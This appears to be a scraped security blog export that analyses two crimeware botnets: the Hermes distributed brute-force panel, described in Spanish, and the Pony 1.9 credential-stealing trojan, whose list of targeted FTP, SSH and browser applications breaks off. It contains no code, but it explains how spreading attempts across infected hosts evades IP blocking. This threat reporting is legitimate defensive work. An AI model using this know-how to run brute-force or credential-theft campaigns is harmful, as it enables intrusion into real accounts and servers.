<span style="font-family: Arial; font-size: 15px;">La botnet Hermes ha sido diseñada para tratar de descubrir las credenciales de acceso a los servidores u otros servicios mediante ataque por fuerza bruta.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Nos
encontramos ante una botnet con un panel de Control casi idéntico al empleado
por el troyano ZEUS pero con funcionalidades diferentes.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Para ello
utiliza los usuarios zombies infectados por el troyano como vectores de ataque
para repartir el proceso de trabajo entre ellos y que cada ordenador infectado
realice múltiples intentos de autenticación contra la máquina destino. Así pues
tenemos una herramienta de Fuerza Bruta Distribuida.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Este es el
Panel de Control de <st1:personname productid="la Botnet Hermes" w:st="on"><st1:personname productid="la Botnet" w:st="on">la Botnet</st1:personname> Hermes</st1:personname>:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s1600/hermes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://1.bp.blogspot.com/-WmR05Ca8WSo/UP8Gn2L095I/AAAAAAAAAb0/JrglWK0b4P4/s400/hermes-B.JPG" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Cuando
mayor número de equipos comprometidos controle el panel de Control mayor será
la potencia del ataque por Fuerza Bruta, lanzando miles de intentos de
autenticación desde diferentes IP. Además de confundir los sistemas de
seguridad del Host atacado al participar en el incidente una gran variedad de
máquinas desde IP’s diferentes simultáneamente lo que dificultara el bloqueo de
estas IP’s al ser bastante complicado contabilizar las peticiones continuadas
desde la misma IP como incidente de fuerza bruta.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En el menu
de configuración del Panel se indica la lista de passwords que se va a emplear
para el ataque por fuerza bruta.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><!--[if gte vml 1]><v:shape
id="_x0000_i1026" type="#_x0000_t75" style='width:183pt;height:297.75pt'>
<v:imagedata src="file:///C:\Windows\Temp\msohtml1\01\clip_image003.jpg"
o:title="hermes-settings-B"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s1600/hermes-settings-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s320/hermes-settings-B.JPG" width="196" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En la
opción Import del Menu se selecciona la máquina objetivo contra la que se va a
realizar el ataque por fuerza bruta distribuida y el nombre del fichero que
previamente se habrá subido al Panel de Control con una lista de nombres de
usuarios contra los que se va a lanzar el par de combinaciones usuario /
contraseña de intentos de autenticación contra dicho Host.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><!--[if gte vml 1]><v:shape
id="_x0000_i1027" type="#_x0000_t75" style='width:424.5pt;height:225pt'>
<v:imagedata src="file:///C:\Windows\Temp\msohtml1\01\clip_image004.jpg"
o:title="hermes-import"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">En el Panel
Hermes que se ha analizado se observa como han empleado para realizar pruebas
ficheros con los rangos de direcciones IP de máquinas activas que están
alojadas en los proveedores de USA , Dreamhost y Godaddy . Así como los
ficheros conteniendo la lista de usuarios para el ataque.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s1600/hermes-import.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s400/hermes-import.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Estos
archivos de usuarios contenían listas de nombres de personas de prueba.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s1600/hermes-users.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s320/hermes-users.jpg" width="129" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Si
observamos el panel de seguimiento de las pruebas realizadas vemos que han
realizado miles de peticiones contra direcciones de Godaddy para probar el
Panel HERMES.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s1600/hermes-notes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s400/hermes-notes-B.JPG" width="218" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Así pues el
día 5-12-2012 realizaron 513.000 intentos de autenticación de fuerza bruta
contra direcciones de Godaddy a las 18:15. 410.000 intentos de autenticación de
fuerza bruta a las 21:15. 481.460 intentos de autenticación de fuerza bruta a
las 22:44</span><span style="font-family: Arial; font-size: 11pt;"> </span><span style="font-family: Arial; font-size: 11pt;">……… etc ….</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-7800099602853103982013-01-16T08:12:00.003-08:002013-01-16T08:12:52.545-08:00BOTNET PONY 1.9 Malware<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:TargetScreenSize>1024x768</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:HyphenationZone>21</w:HyphenationZone>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>ES</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Tabla normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]--><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">For the past few months has been detected at Crimeware
scene a new class of<span style="mso-spacerun: yes;"> </span>Malware called PONY
Bonet. The Pony Control panel is identified by the logo of a this animal that
appears in the famous Facebook game "Farmville"</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The login screen panel of this new botnet Pony is:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s1600/pony-login-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s400/pony-login-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once control panel is accessed, it displays a menu
with all available options. It can see that has been developed to capture all
types of passwords and login credentials of infected users when they access
applications and Internet sites. This is a very powerful type of Spy -
Keylogger Malware with very dangerous features.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s400/pony-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Pony Trojan is configured to capture all kinds of
confidential information and access passwords for the following applications:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Passwords for FTP and SSH servers. The Trojan is able
to recognize almost all FTP & SSH applications both commercial and
opensource and extract its credentials:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"><span style="mso-spacerun: yes;"> </span>System Info ,
FAR Manager , Total Commander , WS_FTP , CuteFTP , FlashFXP , FileZilla , FTP
commander , BulletProof FTP , SmartFTP , TurboFTP , FFFTP , CoffeeCup FTP /
Sitemapper , CoreFTP , FTP Explorer , Frigate3 FTP , SecureFX , UltraFXP ,
FTPRush , WebSitePublisher , BitKinex , ExpanDrive , ClassicFTP , Fling , SoftX
, Directory Opus , FreeFTP / DirectFTP , LeapFTP , WinSCP , 32bit FTP ,
NetDrive , WebDrive , FTP Control , Opera , WiseFTP , FTP Voyager , Firefox ,
FireFTP , SeaMonkey , Flock , Mozilla , LeechFTP , Odin Secure FTP Expert ,
WinFTP , FTP Surfer , FTPGetter , ALFTP , Internet Explorer , Dreamweaver ,
DeluxeFTP , Google Chrome , Chromium / SRWare Iron , ChromePlus , Bromium
(Yandex Chrome) , Nichrome , Comodo Dragon , RockMelt , K-Meleon , Epic ,
